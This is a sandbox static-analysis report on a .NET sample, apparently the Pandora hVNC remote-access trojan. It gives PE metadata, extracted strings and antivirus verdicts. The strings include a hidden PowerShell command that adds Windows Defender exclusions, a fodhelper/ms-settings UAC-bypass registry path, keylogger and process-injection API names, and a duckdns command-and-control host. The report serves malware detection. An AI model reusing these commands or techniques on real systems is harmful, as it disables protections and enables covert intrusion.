Static | ZeroBOX

PE Compile Time

2101-05-26 01:16:21

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00026240 0x00026400 4.51389766423
.rsrc 0x0002a000 0x000010c4 0x00001200 4.91664376116
.reloc 0x0002c000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x0002a0a0 0x000002dc LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0002a37c 0x00000d48 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
-R+ar!
v4.0.30319
#Strings
QLZ_POINTERS_1
kernel32
Microsoft.Win32
ReadInt32
ToInt32
cbReserved2
lpReserved2
QLZ_POINTERS_3
ToInt16
get_UTF8
<Module>
<PrivateImplementationDetails>
DelegateCreateProcessA
LoadLibraryA
StartHVNC
get_ID
set_ID
_hookID
UNCOMPRESSED_END
DESKTOP_JOURNALRECORD
ExclusionWD
SW_HIDE
QLZ_MEMORY_SAFE
CCHDEVICENAME
CCHFORMNAME
DESKTOP_ENUMERATE
DESKTOP_JOURNALPLAYBACK
DF_ALLOWOTHERACCOUNTHOOK
WHKEYBOARDLL
DESKTOP_HOOKCONTROL
UNCONDITIONAL_MATCHLEN
DEFAULT_HEADERLEN
CWORD_LEN
QLZ_VERSION_REVISION
STARTUP_INFORMATION
PROCESS_INFORMATION
WM_KEYDOWN
System.IO
DESKTOP_SWITCHDESKTOP
QLZ_STREAMING_BUFFER
QLZ_VERSION_MAJOR
QLZ_VERSION_MINOR
SECURITY_ATTRIBUTES
HASH_VALUES
get_IP_DNS
set_IP_DNS
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
MINOFFSET
get_PORT
set_PORT
DESKTOP_CREATEMENU
DESKTOP_CREATEWINDOW
CreateDesktopW
get_MUTEX
set_MUTEX
DePikoloData
mscorlib
WinExec
Microsoft.VisualBasic
LowLevelKeyboardProc
dwThreadId
GetWindowThreadProcessId
lpdwProcessId
GetProcessById
bytesRead
idThread
DelegateResumeThread
thread
IsInstalled
sizeCompressed
size_compressed
sizeDecompressed
size_decompressed
lpReserved
<ID>k__BackingField
<IP_DNS>k__BackingField
<PORT>k__BackingField
<MUTEX>k__BackingField
method
IsNullOrWhiteSpace
device
source
vkCode
wScanCode
keyCode
set_Mode
deviceMode
FileMode
PaddingMode
CipherMode
Message
EndInvoke
BeginInvoke
IDisposable
compressible
compatible
ThreadHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
bInheritHandle
handle
InstallFile
IsInRole
WindowsBuiltInRole
lpTitle
GetActiveWindowTitle
CurrentActiveWindowTitle
get_MainWindowTitle
get_MainModule
ProcessModule
get_Name
get_FileName
lpModuleName
exeName
get_FullName
applicationName
desktopName
get_ProcessName
GetProcessesByName
DirectoryName
filename
commandLine
WriteLine
get_NewLine
Combine
ValueType
uMapType
operType
get_Culture
set_Culture
resourceCulture
MethodBase
Dispose
Create
MulticastDelegate
GetKeyboardState
EditorBrowsableState
SetApartmentState
lpKeyState
GetKeyState
Delete
fast_write
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
dLByte
GetValue
SetValue
Stub.exe
dwXSize
dwYSize
get_Size
bufferSize
SizeOf
cchBuff
pwszBuff
System.Threading
set_Padding
UTF8Encoding
System.Runtime.Versioning
FromBase64String
ToBase64String
ToString
GetString
Substring
ComputeHash
ComputeStringHash
get_ExecutablePath
GetTempPath
GetFolderPath
ologgerPath
get_Length
nLength
length
LoadApi
CreateApi
AsyncCallback
HookCallback
callback
TransformFinalBlock
idHook
SetHook
accessMask
Marshal
System.Security.Principal
WindowsPrincipal
System.ComponentModel
kernel32.dll
user32.dll
FileStream
lParam
wParam
Program
System
SymmetricAlgorithm
HashAlgorithm
ICryptoTransform
resourceMan
headerLen
hidden
bytesWritten
IsAdmin
MessageBoxIcon
Application
processInformation
System.Globalization
Interaction
DelegateZwUnmapViewOfSection
System.Reflection
ArgumentException
Environ
HandleRun
TryRun
MethodInfo
FileInfo
CultureInfo
FileSystemInfo
startupInfo
ParameterInfo
DirectoryInfo
Pikolo
Copikolo
CreateDesktop
lpDesktop
hNewDesktop
write_header
MD5CryptoServiceProvider
TripleDESCryptoServiceProvider
StringBuilder
SpecialFolder
folder
Buffer
buffer
get_ResourceManager
Identifier
System.CodeDom.Compiler
Installer
ToUpper
initexplorer
CurrentUser
ToGenericParameter
StreamWriter
TextWriter
GetDelegateForFunctionPointer
BitConverter
ToLower
hStdError
.cctor
lpSecurityDescriptor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
Stub.Properties.Resources.resources
DebuggingModes
Stub.Properties
inheritHandles
GetProcesses
set_Attributes
threadAttributes
FileAttributes
processAttributes
attributes
ReadAllBytes
GetBytes
numbytes
creationFlags
dwFlags
System.Windows.Forms
Contains
Conversions
MessageBoxButtons
get_Chars
dwXCountChars
dwYCountChars
GetParameters
FileAccess
hProcess
GetCurrentProcess
process
GetProcAddress
baseAddress
address
decompress
get_Exists
Concat
Object
object
protect
System.Net
op_Explicit
UACxploit
IAsyncResult
DialogResult
result
WebClient
Environment
environment
GetCurrent
get_EntryPoint
ParameterizedThreadStart
Convert
ipport
GetKeyboardLayout
hStdInput
hStdOutput
System.Text
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
GetForegroundWindow
GetConsoleWindow
wShowWindow
nCmdShow
DelegateVirtualAllocEx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MessageBox
set_Key
CreateSubKey
OpenSubKey
GetRegKey
MapVirtualKey
wVirtKey
RegistryKey
System.Security.Cryptography
get_Assembly
BlockCopy
DelegateReadProcessMemory
DelegateWriteProcessMemory
CreateDirectory
currentDirectory
InstallRegistry
op_Equality
System.Security
WindowsIdentity
IsNullOrEmpty
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
WrapNonExceptionThrows
Copyright
2021
$835bcf68-5f0d-428b-bf86-f859a34555d8
.NETFramework,Version=v4.5.2
FrameworkDisplayName
.NET Framework 4.5.2P.
7System.Security.Permissions.SecurityPermissionAttribute
SkipVerification
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config.
Makes the application long-path aware. See https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
C# version only supports level 1 and 3
RemoteDesktop
Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
CqbkTHriRRbQjaArtJfF
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c
explorer.exe,
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=
Software\Classes\ms-settings\shell\open\command
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath '
DelegateExecute
C:\Windows\System32\ComputerDefaults.exe
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\System32\fodhelper.exe
cmd.exe /k START
outside-agent.duckdns.org
UpdateGroup
TaiaVMXoI
QwwMNoAWc
fuZHaZqmi.exe
Do You Want To Install Pandora hVNC?
Pandora hVNC
cvtres
Pandora WILL NOT be installed to your system
APPDATA
\tempp4nd0r4
\tempp4nd0r4on
Stub.Properties.Resources
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
InternalName
Stub.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
Assembly Version
3.6.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Generic.4!c
tehtris Clean
MicroWorld-eScan IL:Trojan.MSILZilla.11609
ClamAV Win.Packed.Injectorx-9916498-0
FireEye Generic.mg.97acdf48c972303f
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
ALYac IL:Trojan.MSILZilla.11609
Malwarebytes Spyware.PasswordStealer
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender IL:Trojan.MSILZilla.11609
K7GW Clean
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta AI:Packer.51B5358D1F
VirIT Trojan.Win32.MSIL_Heur.B
Cyren W32/MSIL_Troj.C.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Spy.Keylogger.DUS
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba Backdoor:MSIL/XHVNC.4c06d3d9
NANO-Antivirus Clean
ViRobot Clean
Rising Spyware.Keylogger!8.12F (TFE:dGZlOg18xYXriTp8fg)
Sophos Mal/MSIL-AZ
Baidu Clean
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.KeyloggerNET.41
VIPRE IL:Trojan.MSILZilla.11609
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.ct
Trapmine Clean
CMC Clean
Emsisoft IL:Trojan.MSILZilla.11609 (B)
SentinelOne Static AI - Malicious PE
GData IL:Trojan.MSILZilla.11609
Jiangmin Clean
Webroot Clean
Avira TR/Dropper.Gen
MAX malware (ai score=87)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D2D59
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Inject.gen
Microsoft Backdoor:MSIL/XHVNC.A!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C4997337
Acronis suspicious
McAfee Artemis!97ACDF48C972
TACHYON Clean
DeepInstinct MALICIOUS
VBA32 Clean
Cylance unsafe
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Msil.Trojan.Inject.Ncnw
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet Clean
AVG Win32:KeyloggerX-gen [Trj]
Avast Win32:KeyloggerX-gen [Trj]
No IRMA results available.